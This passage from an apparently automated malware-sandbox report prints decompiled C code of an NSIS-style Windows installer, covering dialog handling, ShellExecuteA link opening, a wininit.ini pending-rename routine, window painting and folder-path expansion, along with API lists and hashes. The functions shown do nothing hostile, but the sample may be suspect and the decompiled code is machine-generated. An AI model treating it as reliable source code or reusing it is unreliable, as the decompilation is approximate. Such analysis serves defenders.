				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42a888 =  *0x42a888 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403E2A(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42e3c0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42f424, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42f424, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42a888 != 0) {
						goto L25;
					} else {
						_t112 =  *0x42a078 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403DE5(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404196();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42ebfc; // 0x7ef1da
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x42f458;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403ED7;
				E00403DC3(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403DC3(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403DE5( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403DF8(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x42f428 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x42986c =  *0x42986c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x42a888 =  *0x42a888 & 0x00000000;
				return 0;
			}


















                                                                          0x00403f1b
                                                                          0x00404041
                                                                          0x0040409d
                                                                          0x004040a1
                                                                          0x00404178
                                                                          0x0040417a
                                                                          0x0040417a
                                                                          0x00404180
                                                                          0x00404180
                                                                          0x00404183
                                                                          0x00000000
                                                                          0x0040418a
                                                                          0x004040af
                                                                          0x004040b1
                                                                          0x004040bb
                                                                          0x004040c6
                                                                          0x004040c9
                                                                          0x004040cc
                                                                          0x004040d7
                                                                          0x004040da
                                                                          0x004040e1
                                                                          0x004040ef
                                                                          0x00404107
                                                                          0x0040411a
                                                                          0x0040412a
                                                                          0x0040412c
                                                                          0x0040412c
                                                                          0x004040e1
                                                                          0x00404136
                                                                          0x00000000
                                                                          0x00404141
                                                                          0x00404145
                                                                          0x00404156
                                                                          0x00404156
                                                                          0x0040415c
                                                                          0x0040416a
                                                                          0x0040416a
                                                                          0x00000000
                                                                          0x0040416e
                                                                          0x00404136
                                                                          0x0040404c
                                                                          0x00000000
                                                                          0x00404060
                                                                          0x00404066
                                                                          0x0040406c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00404091
                                                                          0x00404093
                                                                          0x00404098
                                                                          0x00000000
                                                                          0x00404098
                                                                          0x0040404c
                                                                          0x00403f21
                                                                          0x00403f24
                                                                          0x00403f29
                                                                          0x00403f2b
                                                                          0x00403f3a
                                                                          0x00403f3a
                                                                          0x00403f41
                                                                          0x00403f44
                                                                          0x00403f46
                                                                          0x00403f4b
                                                                          0x00403f54
                                                                          0x00403f5a
                                                                          0x00403f66
                                                                          0x00403f69
                                                                          0x00403f72
                                                                          0x00403f77
                                                                          0x00403f7a
                                                                          0x00403f7f
                                                                          0x00403f96
                                                                          0x00403f9d
                                                                          0x00403fb0
                                                                          0x00403fb3
                                                                          0x00403fc8
                                                                          0x00403fcf
                                                                          0x00403fd4
                                                                          0x00403fd9
                                                                          0x00403fd9
                                                                          0x00403fe8
                                                                          0x00403ff7
                                                                          0x00403ff9
                                                                          0x0040400f
                                                                          0x0040401e
                                                                          0x00404020
                                                                          0x00000000

                                                                          APIs
                                                                          • CheckDlgButton.USER32 ref: 00403F96
                                                                          • GetDlgItem.USER32 ref: 00403FAA
                                                                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403FC8
                                                                          • GetSysColor.USER32(?), ref: 00403FD9
                                                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403FE8
                                                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403FF7
                                                                          • lstrlenA.KERNEL32(?), ref: 00404001
                                                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040400F
                                                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040401E
                                                                          • GetDlgItem.USER32 ref: 00404081
                                                                          • SendMessageA.USER32(00000000), ref: 00404084
                                                                          • GetDlgItem.USER32 ref: 004040AF
                                                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004040EF
                                                                          • LoadCursorA.USER32 ref: 004040FE
                                                                          • SetCursor.USER32(00000000), ref: 00404107
                                                                          • ShellExecuteA.SHELL32(0000070B,open,0042E3C0,00000000,00000000,00000001), ref: 0040411A
                                                                          • LoadCursorA.USER32 ref: 00404127
                                                                          • SetCursor.USER32(00000000), ref: 0040412A
                                                                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404156
                                                                          • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040416A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                          • String ID: Hyvkfcorf$N$open
                                                                          • API String ID: 3615053054-1675556225
                                                                          • Opcode ID: 0e461305457e209acf086288c6f298716e5b31ce5db75a0c6c55c4075ebce297
                                                                          • Instruction ID: 74e3a25a4ac884a07ee3b1bf84c617da9f937bcc22f9c720612e6a340156d24e
                                                                          • Opcode Fuzzy Hash: 0e461305457e209acf086288c6f298716e5b31ce5db75a0c6c55c4075ebce297
                                                                          • Instruction Fuzzy Hash: 8761B571A40209BFDB10AF60DD45F6A3BA9EB54715F10403AFB017A2D1C7B8A951CF99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00405723, Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 151filememorystringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 94%
                                                                          			E00405723(long _a4, long _a16) {
				CHAR* _v0;
				intOrPtr* _t13;
				long _t14;
				int _t19;
				void* _t27;
				long _t28;
				intOrPtr* _t36;
				int _t42;
				intOrPtr* _t43;
				long _t48;
				CHAR* _t50;
				void* _t52;
				void* _t54;

				_t13 = E00405CEE("KERNEL32.dll", "MoveFileExA");
				_t50 = _v0;
				if(_t13 != 0) {
					_t19 =  *_t13(_a4, _t50, 5);
					if(_t19 != 0) {
						L16:
						 *0x42f4b0 =  *0x42f4b0 + 1;
						return _t19;
					}
				}
				 *0x42ca30 = 0x4c554e;
				if(_t50 == 0) {
					L5:
					_t14 = GetShortPathNameA(_a4, 0x42c4a8, 0x400);
					if(_t14 != 0 && _t14 <= 0x400) {
						_t42 = wsprintfA(0x42c0a8, "%s=%s\r\n", 0x42ca30, 0x42c4a8);
						GetWindowsDirectoryA(0x42c4a8, 0x3f0);
						lstrcatA(0x42c4a8, "\\wininit.ini");
						_t19 = CreateFileA(0x42c4a8, 0xc0000000, 0, 0, 4, 0x8000080, 0);
						_t54 = _t19;
						if(_t54 == 0xffffffff) {
							goto L16;
						}
						_t48 = GetFileSize(_t54, 0);
						_t5 = _t42 + 0xa; // 0xa
						_t52 = GlobalAlloc(0x40, _t48 + _t5);
						if(_t52 == 0 || ReadFile(_t54, _t52, _t48,  &_a16, 0) == 0 || _t48 != _a16) {
							L15:
							_t19 = CloseHandle(_t54);
							goto L16;
						} else {
							if(E00405640(_t52, "[Rename]\r\n") != 0) {
								_t27 = E00405640(_t25 + 0xa, "\n[");
								if(_t27 == 0) {
									L13:
									_t28 = _t48;
									L14:
									E0040568C(_t52 + _t28, 0x42c0a8, _t42);
									SetFilePointer(_t54, 0, 0, 0);
									WriteFile(_t54, _t52, _t48 + _t42,  &_a4, 0);
									GlobalFree(_t52);
									goto L15;
								}
								_t36 = _t27 + 1;
								_t43 = _t36;
								if(_t36 >= _t52 + _t48) {
									L21:
									_t28 = _t36 - _t52;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t42)) =  *_t43;
									_t43 = _t43 + 1;
								} while (_t43 < _t52 + _t48);
								goto L21;
							}
							E004059DB(_t52 + _t48, "[Rename]\r\n");
							_t48 = _t48 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E004056AC(_t50, 0, 1));
					_t14 = GetShortPathNameA(_t50, 0x42ca30, 0x400);
					if(_t14 != 0 && _t14 <= 0x400) {
						goto L5;
					}
				}
				return _t14;
			}
















                                                                          0x00405731
                                                                          0x00405738
                                                                          0x0040573c
                                                                          0x00405745
                                                                          0x00405749
                                                                          0x00405895
                                                                          0x00405895
                                                                          0x00000000
                                                                          0x00405895
                                                                          0x00405749
                                                                          0x00405755
                                                                          0x0040576b
                                                                          0x00405793
                                                                          0x0040579e
                                                                          0x004057a2
                                                                          0x004057c5
                                                                          0x004057cd
                                                                          0x004057d9
                                                                          0x004057f0
                                                                          0x004057f6
                                                                          0x004057fb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040580a
                                                                          0x0040580c
                                                                          0x00405819
                                                                          0x0040581d
                                                                          0x0040588e
                                                                          0x0040588f
                                                                          0x00000000
                                                                          0x00405839
                                                                          0x00405846
                                                                          0x004058ab
                                                                          0x004058b2
                                                                          0x00405859
                                                                          0x00405859
                                                                          0x0040585b
                                                                          0x00405864
                                                                          0x0040586f
                                                                          0x00405881
                                                                          0x00405888
                                                                          0x00000000
                                                                          0x00405888
                                                                          0x004058b4
                                                                          0x004058ba
                                                                          0x004058bc
                                                                          0x004058cb
                                                                          0x004058cb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004058be
                                                                          0x004058be
                                                                          0x004058c0
                                                                          0x004058c3
                                                                          0x004058c7
                                                                          0x00000000
                                                                          0x004058be
                                                                          0x00405851
                                                                          0x00405856
                                                                          0x00000000
                                                                          0x00405856
                                                                          0x0040581d
                                                                          0x0040576d
                                                                          0x00405778
                                                                          0x00405781
                                                                          0x00405785
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00405785
                                                                          0x0040589f

                                                                          APIs
                                                                            • Part of subcall function 00405CEE: GetModuleHandleA.KERNEL32(000000F1,00405736,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054D8,?,00000000,000000F1,?), ref: 00405CF2
                                                                            • Part of subcall function 00405CEE: LoadLibraryA.KERNEL32(000000F1,?,?,004054D8,?,00000000,000000F1,?), ref: 00405D00
                                                                            • Part of subcall function 00405CEE: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405D0F
                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054D8,?,00000000,000000F1,?), ref: 00405778
                                                                          • GetShortPathNameA.KERNEL32 ref: 00405781
                                                                          • GetShortPathNameA.KERNEL32 ref: 0040579E
                                                                          • wsprintfA.USER32 ref: 004057BC
                                                                          • GetWindowsDirectoryA.KERNEL32(0042C4A8,000003F0,?,?,00000000,000000F1,?), ref: 004057CD
                                                                          • lstrcatA.KERNEL32(0042C4A8,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057D9
                                                                          • CreateFileA.KERNEL32(0042C4A8,C0000000,00000000,00000000,00000004,08000080,00000000,0042C4A8,\wininit.ini,?,?,00000000,000000F1,?), ref: 004057F0
                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,000000F1,?), ref: 00405804
                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405813
                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 00405829
                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042C0A8,00000000,-0000000A,00409308,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040586F
                                                                          • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405881
                                                                          • GlobalFree.KERNEL32 ref: 00405888
                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 0040588F
                                                                            • Part of subcall function 00405640: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405844,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405647
                                                                            • Part of subcall function 00405640: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405844,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405677
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocCreateDirectoryFreeLibraryLoadModulePointerProcReadSizeWindowsWritelstrcatwsprintf
                                                                          • String ID: %s=%s$KERNEL32.dll$MoveFileExA$[Rename]$\wininit.ini
                                                                          • API String ID: 3633819597-1342836890
                                                                          • Opcode ID: 36c133e8bbafd4ff63adde3db96e128c05ba176af3752b4c43bc51613ef0b32f
                                                                          • Instruction ID: a1a0e0f9ef0cd972c6a82fac1fe668e7cfe11d0cfdfeabcff745320237112b5d
                                                                          • Opcode Fuzzy Hash: 36c133e8bbafd4ff63adde3db96e128c05ba176af3752b4c43bc51613ef0b32f
                                                                          • Instruction Fuzzy Hash: C0411372640B11BBE2203B219C89F6B3A5CDF85755F144536FE05F62D2EA38AC018EBD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 90%
                                                                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42f428;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "obsolete Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42f424;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                                          0x0040100a
                                                                          0x00401039
                                                                          0x00401047
                                                                          0x0040104d
                                                                          0x00401051
                                                                          0x0040105b
                                                                          0x00401061
                                                                          0x00401064
                                                                          0x004010f3
                                                                          0x00401089
                                                                          0x0040108c
                                                                          0x004010a6
                                                                          0x004010bd
                                                                          0x004010cc
                                                                          0x004010cf
                                                                          0x004010d5
                                                                          0x004010d9
                                                                          0x004010e4
                                                                          0x004010ed
                                                                          0x004010ef
                                                                          0x004010ef
                                                                          0x00401100
                                                                          0x00401105
                                                                          0x0040110d
                                                                          0x00401110
                                                                          0x00401112
                                                                          0x00401118
                                                                          0x0040111f
                                                                          0x00401126
                                                                          0x00401130
                                                                          0x00401142
                                                                          0x00401156
                                                                          0x00401160
                                                                          0x00401165
                                                                          0x00401165
                                                                          0x00401110
                                                                          0x0040116e
                                                                          0x00000000
                                                                          0x00401178
                                                                          0x00401010
                                                                          0x00401013
                                                                          0x00401015
                                                                          0x0040101f
                                                                          0x0040101f
                                                                          0x00000000

                                                                          APIs
                                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                          • GetClientRect.USER32 ref: 0040105B
                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                          • FillRect.USER32 ref: 004010E4
                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                          • DrawTextA.USER32(00000000,obsolete Setup,000000FF,00000010,00000820), ref: 00401156
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                          • String ID: F$obsolete Setup
                                                                          • API String ID: 941294808-3189423524
                                                                          • Opcode ID: 912aa521ca95eb435e7b4df28ced32df10b76a863633605e6027fd9c7ce49bbb
                                                                          • Instruction ID: dcdf37c0a61dcd20993090bd1158cb83bc568099e5e3d0b1b0767e43f48950cc
                                                                          • Opcode Fuzzy Hash: 912aa521ca95eb435e7b4df28ced32df10b76a863633605e6027fd9c7ce49bbb
                                                                          • Instruction Fuzzy Hash: 2C41AA71804249AFCB058FA5CD459BFBFB9FF44324F00802AF951AA1A0C778EA54DFA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004059FD, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 180stringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 88%
                                                                          			E004059FD(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, char _a11) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				CHAR* _t35;
				signed int _t37;
				signed int _t38;
				signed int _t49;
				char _t51;
				signed int _t61;
				char* _t62;
				char _t67;
				signed int _t69;
				intOrPtr _t71;
				CHAR* _t79;
				signed int _t86;
				signed int _t88;
				void* _t89;

				_t61 = _a8;
				if(_t61 < 0) {
					_t71 =  *0x42ebfc; // 0x7ef1da
					_t61 =  *(_t71 - 4 + _t61 * 4);
				}
				_t62 = _t61 +  *0x42f458;
				_t35 = 0x42e3c0;
				_t79 = 0x42e3c0;
				if(_a4 - 0x42e3c0 < 0x800) {
					_t79 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t67 =  *_t62;
					_a11 = _t67;
					if(_t67 == 0) {
						break;
					}
					__eflags = _t79 - _t35 - 0x400;
					if(_t79 - _t35 >= 0x400) {
						break;
					}
					_t62 = _t62 + 1;
					__eflags = _t67 - 0xfc;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t79 = _t67;
							_t79 =  &(_t79[1]);
							__eflags = _t79;
						} else {
							 *_t79 =  *_t62;
							_t79 =  &(_t79[1]);
							_t62 = _t62 + 1;
						}
						continue;
					}
					_t37 =  *((char*)(_t62 + 1));
					_t69 =  *_t62;
					_t86 = (_t37 & 0x0000007f) << 0x00000007 | _t69 & 0x0000007f;
					_v28 = _t69;
					_v20 = _t37;
					_t70 = _t69 | 0x00008000;
					_t38 = _t37 | 0x00008000;
					_v24 = _t69 | 0x00008000;
					_t62 = _t62 + 2;
					__eflags = _a11 - 0xfe;
					_v16 = _t38;
					if(_a11 != 0xfe) {
						__eflags = _a11 - 0xfd;
						if(_a11 != 0xfd) {
							__eflags = _a11 - 0xff;
							if(_a11 == 0xff) {
								__eflags = (_t38 | 0xffffffff) - _t86;
								E004059FD(_t62, _t79, _t86, _t79, (_t38 | 0xffffffff) - _t86);
							}
							L38:
							_t79 =  &(_t79[lstrlenA(_t79)]);
							_t35 = 0x42e3c0;
							continue;
						}
						__eflags = _t86 - 0x1b;
						if(_t86 != 0x1b) {
							__eflags = (_t86 << 0xa) + 0x430000;
							E004059DB(_t79, (_t86 << 0xa) + 0x430000);
						} else {
							E00405939(_t79,  *0x42f424);
						}
						__eflags = _t86 + 0xffffffeb - 6;
						if(_t86 + 0xffffffeb < 6) {
							L29:
							E00405C17(_t79);
						}
						goto L38;
					}
					_a8 = _a8 & 0x00000000;
					 *_t79 =  *_t79 & 0x00000000;
					_t88 = 4;
					__eflags = _v20 - _t88;
					if(_v20 != _t88) {
						_t49 = _v28;
						__eflags = _t49 - 0x2b;
						if(_t49 != 0x2b) {
							__eflags = _t49 - 0x26;
							if(_t49 != 0x26) {
								__eflags = _t49 - 0x25;
								if(_t49 != 0x25) {
									__eflags = _t49 - 0x24;
									if(_t49 != 0x24) {
										goto L19;
									}
									GetWindowsDirectoryA(_t79, 0x400);
									goto L18;
								}
								GetSystemDirectoryA(_t79, 0x400);
								goto L18;
							}
							E004058CF(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "ProgramFilesDir", _t79);
							__eflags =  *_t79;
							if( *_t79 != 0) {
								goto L29;
							}
							E004059DB(_t79, "C:\\Program Files");
							goto L18;
						} else {
							E004058CF(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", "CommonFilesDir", _t79);
							L18:
							__eflags =  *_t79;
							if( *_t79 != 0) {
								goto L29;
							}
							goto L19;
						}
					} else {
						_a8 = "\\Microsoft\\Internet Explorer\\Quick Launch";
						L19:
						__eflags =  *0x42f4a4;
						if( *0x42f4a4 == 0) {
							_t88 = 2;
						}
						do {
							_t88 = _t88 - 1;
							_t51 = SHGetSpecialFolderLocation( *0x42f424,  *(_t89 + _t88 * 4 - 0x18),  &_v8);
							__eflags = _t51;
							if(_t51 != 0) {
								 *_t79 =  *_t79 & 0x00000000;
								__eflags =  *_t79;
								goto L25;
							}
							__imp__SHGetPathFromIDListA(_v8, _t79);
							_v12 = _t51;
							E00405238(_t70, _v8);
							__eflags = _v12;
							if(_v12 != 0) {
								break;
							}
							L25:
							__eflags = _t88;
						} while (_t88 != 0);
						__eflags =  *_t79;
						if( *_t79 != 0) {
							__eflags = _a8;
							if(_a8 != 0) {
								lstrcatA(_t79, _a8);
							}
						}
						goto L29;
					}
				}
				 *_t79 =  *_t79 & 0x00000000;
				if(_a4 == 0) {
					return _t35;
				}
				return E004059DB(_a4, _t35);
			}























                                                                          0x00405a04
                                                                          0x00405a0b
                                                                          0x00405a0d
                                                                          0x00405a1c
                                                                          0x00405a1c
                                                                          0x00405a26
                                                                          0x00405a28
                                                                          0x00405a2f
                                                                          0x00405a37
                                                                          0x00405a3d
                                                                          0x00405a40
                                                                          0x00405a40
                                                                          0x00405bf1
                                                                          0x00405bf1
                                                                          0x00405bf5
                                                                          0x00405bf8
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00405a4d
                                                                          0x00405a53
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00405a59
                                                                          0x00405a5a
                                                                          0x00405a5d
                                                                          0x00405be4
                                                                          0x00405bee
                                                                          0x00405bf0
                                                                          0x00405bf0
                                                                          0x00405be6
                                                                          0x00405be8
                                                                          0x00405bea
                                                                          0x00405beb
                                                                          0x00405beb
                                                                          0x00000000
                                                                          0x00405be4
                                                                          0x00405a63
                                                                          0x00405a67
                                                                          0x00405a77
                                                                          0x00405a7e
                                                                          0x00405a81
                                                                          0x00405a84
                                                                          0x00405a86
                                                                          0x00405a89
                                                                          0x00405a8c
                                                                          0x00405a8d
                                                                          0x00405a91
                                                                          0x00405a94
                                                                          0x00405b8f
                                                                          0x00405b93
                                                                          0x00405bc3
                                                                          0x00405bc7
                                                                          0x00405bcc
                                                                          0x00405bd0
                                                                          0x00405bd0
                                                                          0x00405bd5
                                                                          0x00405bdb
                                                                          0x00405bdd
                                                                          0x00000000
                                                                          0x00405bdd
                                                                          0x00405b95
                                                                          0x00405b98
                                                                          0x00405bad
                                                                          0x00405bb4
                                                                          0x00405b9a
                                                                          0x00405ba1
                                                                          0x00405ba1
                                                                          0x00405bbc
                                                                          0x00405bbf
                                                                          0x00405b87
                                                                          0x00405b88
                                                                          0x00405b88
                                                                          0x00000000
                                                                          0x00405bbf
                                                                          0x00405a9a
                                                                          0x00405a9e
                                                                          0x00405aa3
                                                                          0x00405aa4
                                                                          0x00405aa7
                                                                          0x00405ab2
                                                                          0x00405ab5
                                                                          0x00405ab8
                                                                          0x00405ad1
                                                                          0x00405ad4
                                                                          0x00405b01
                                                                          0x00405b04
                                                                          0x00405b14
                                                                          0x00405b17
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00405b1f
                                                                          0x00000000
